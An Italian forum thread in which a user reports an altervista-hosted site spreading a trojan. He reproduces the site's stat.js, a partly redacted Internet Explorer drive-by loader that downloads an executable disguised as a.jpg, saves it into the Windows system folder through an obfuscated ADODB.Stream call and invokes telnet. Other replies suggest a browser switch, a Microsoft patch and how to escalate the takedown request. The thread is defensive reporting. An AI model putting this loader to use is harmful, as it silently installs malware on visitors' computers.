c'è un trojan su sito su altervista, ma non lo hanno ancora tolto...

[ateicos]

salve,
premetto che vi esorto a non aprire gli indirizzi che vi incollo di seguito poichè potreste infettarvi col suddetto trojan.

qualche giorno fa qualcuno ha tentato di infettarmi invitandomi ad aprire questa pagina ********.altervista.org (richiamata tramite frame nascosti su altri indirizzi).

avendo mozilla forse la cosa non è riuscita (a quanto pare tale trojan sfruttava vulnerabilità di internet explorer).

quindi dopo che mi hanno avvertito del pericolo, ho scritto una e-mail ai responsabili di altervista chiedendo l'immediata rimozioni di tali files e la chiusura di quell'account.

DOPO 9 GIORNI, non ho ricevuto alcuna risposta da parte dei responsabili di altervista.org.


Che altro posso fare?
A presto, Totò


vi posto la e-mail che ho inviato loro.

Dinstinta redazione di Altervista.org
in questi giorni alcune persone mi hanno segnalato questo sito. http://********.altervista.org invitandomi a visitarlo.
oggi alcune persone mi hanno avvertito della presenza di un trojan presente nelle pagine, quindi ho voluto controllare coi miei occhi tali pagine, sicuro di essere immune da attacchi propinati tramite pagine web.

la pubblicazione di questo sito con tale materiale atto ad accedere al pc dell'utente, sarebbe causa di denuncia per il webmaster, e forse anche per voi.

il file http://********.altervista.org/a.jpg altro non è che un "eseguibile" che consente di aprire un trojan nel pc della vittima.
lo script http://********.altervista.org/stat.js consentirebbe l'esecuzione di una sessione telnet che da accesso al pc

spero abbiate l'accortezza di agire contro i responsabili di tale reato (classificato come crimine informatico in quanto consente l'accesso al computer di una persona, e punibile per legge), quindi chiudere nel minor tempo possibile il sito.


Distinti saluti, Salvatore PECORARO



vi incollo una parte del testo contenuto nel file http://********.altervista.org/a.jpg
Í!¸
LÍ!This program cannot be run in DOS mode.



vi incollo il contenuto del file http://********.altervista.org/stat.js

if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) {
statpath="C:\\WINNT\\system32\\********";
} else if ((navigator.appVersion.indexOf("Windows 98")!=-1) || (navigator.appVersion.indexOf("Windows 95")!=-1) || (navigator.appVersion.indexOf("Win95")!=-1) || (navigator.appVersion.indexOf("Win98")!=-1)) {
statpath="C:\\WINDOWS\\*******";
} else if (navigator.appVersion.indexOf("XP")!=-1) {
statpath="C:\\WINDOWS\\system32\\********";
} else {
statpath="C:\\WINDOWS\\system32\\*********";
}

var m = new ***********("Microsoft.XMLHTTP");
m.Open("GET", "http://********.altervista.org/a.jpg",0);
m.Send();

function stat1() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }

var b = ******************
b.Mode = 3;
b.Type = 1;
b.Open();
b.Write(m.responseBody);

b.SaveToFile(statpath,2);
********** = "telnet://";

messaggio modificato

[mardux]

Originariamente inviato da ateicos
Che altro posso fare?

nn usare explorer..

continuare ad usare Mozilla..

[Habanero]

è l'exploit del momento per quanto riguarda Explorer.

Ti consiglio di installare questa patch di microsoft che disabilita l'oggetto ADODB.stream che sfruttando alcune vulnerabilità di IE consente ad un sito non proprio raccomandabile di installare programmi ad tua insaputa sul tuo PC.

http://support.microsoft.com/default.aspx?kbid=870669

[ateicos]

ma io volevo fare chiudere quel sito, è diverso!

la preoccupazione non è per me, ma per gli altri!

[makuro]

Se vuoi dare forza alla tua mail, rispediscila inserendo in
copia di conoscenza qualche ufficio statale (per le telecomunicazioni ad esempio). Magari la leggono meglio... Poi il tutto dipende dalle politiche aziendali dei gestori dei server.

[amvinfe]

non era necessario postare in chiaro l'url del sito, per favore la prossima volta evita una cosa del genere.

Grazie

Marco(amvinfe)

[ateicos]

Originariamente inviato da amvinfe
non era necessario postare in chiaro l'url del sito, per favore la prossima volta evita una cosa del genere.

Grazie

Marco(amvinfe)

anche a me sembra brutto, ma è questo l'url, non ho pensato a mettere i **** al posto di quella bestemmia, mi scuso con tutti.

per quanto riguarda l'inoltro a istituzioni e simili, non credo possa servire più di tanto.

a quale tipo di ufficio dovrei comunicarlo?